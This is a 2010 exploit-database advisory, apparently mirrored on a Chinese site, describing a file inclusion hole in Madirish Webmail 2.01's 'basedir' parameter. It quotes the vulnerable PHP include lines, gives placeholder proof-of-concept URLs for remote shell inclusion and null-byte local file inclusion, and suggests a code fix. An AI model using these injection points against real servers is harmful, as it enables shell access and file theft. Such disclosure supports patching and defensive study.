Madirish Webmail 2.01 – ‘baseDir’ Local/Remote File Inclusion

• Exploit Database
• 6 阅读

• 作者： eidelweiss
  日期： 2010-04-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12369/

• =====================================================
  Madirish Webmail 2.01 (basedir) RFI/LFI Vulnerability
  =====================================================
   
  1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
  0 _ __ __ __ 1
  1 /' \__/'__`\/\ \__/'__`\ 0
  0/\_, \___ /\_\/\_\ \ \___\ \ ,_\/\ \/\ \_ ___ 1
  1\/_/\ \ /' _ `\ \/\ \/_/_\_<_/'___\ \ \/\ \ \ \ \/\`'__\0
  0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
  1\ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
  0 \/_/\/_/\/_/\ \_\ \/___/\/____/ \/__/ \/___/\/_/ 1
  1\ \____/ >> Exploit database separated by exploit 0
  0 \/___/type (local, remote, DoS, etc.)1
  11
  0[+] Site: Inj3ct0r.com0
  1[+] Support e-mail: submit[at]inj3ct0r.com1
  00
  1########################################1
  0I'm eidelweiss member from Inj3ct0r Team1
  1########################################0
  0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
   
  Download:	http://sourceforge.net/projects/madirishwebmail/files/madirish_webmail/2.01/Madirish_Webmail.tgz/download
   
  Author:		eidelweiss
  Contact:	eidelweiss[at]cyberservices.com
  Thank`s:	r0073r & 0x1D (inj3ct0r) , JosS , exploit-db team , [D]eal [C]yber
  		sp3x (securityreason) And All Friends.
   
  	Successful exploitation requires that "register_globals" is enabled. 	
   
  ========================================================================
   
  Description:
   
  Madirish Webmail is a PHP based email agent (with an Address Book and Calendar) primarily used to access a POP3 account via the web.
  The system uses MySQL and PHP, and while developed for Linux, will probably work on other platforms.
   
  ========================================================================
   
  	-=[ VULN C0de ]=-
  
  There is a vulnerability in almost every file directory , for example in this Directory file:
  
  [-] Madirish_Webmail/lib/addressbook.php
  
  */
  require_once($basedir."lib/sql.php");
  require_once($basedir."lib/html.php");
  
  *************************************************
  [!]This other sample vuln c0de which affected to LFI [!]
  *************************************************
  
  [-] Madirish_Webmail/index.php
  
  */
  require_once ("inc/config.php");	//<= 1
  require_once ($basedir."lib/html.php");
  require_once ($basedir."lib/common.php");	//<=2	
  ========================================================================
   
  	-=[ P0C RFI ]=-
  
  	http://127.0.0.1/Madirish_Webmail/lib/addressbook.php?basedir= [sh3ll inj3ct0r]
  
  	-=[ P0C LFI ]=-
  
  	http://127.0.0.1/Madirish_Webmail/index.php?basedir= [LFI]%00
  
  	etc, etc, etc
  
  ========================================================================
  
  NB:
  There is a vulnerability in almost every file directory of Madirish Webmail v2.01.
  Vendor fix the vulnerability in version 2.0 and update to v2.0.1
  But vendor not perfectly fix the vulnerability , they just edit the code to handle Remote file inclusions,
  but as we see still have RFI vulnerability and now i see possible LFI there.
  
  Solution: Fix / Edit the code or update to new version if available, Example:
  
  */
  require_once($basedir."lib/sql.php");	// change into require_once("Madirish_Webmail/lib/sql.php");
  require_once($basedir."lib/html.php");	// change into require_once("Madirish_Webmail/lib/html.php");
  
  =========================| -=[ E0F ]=- |=================================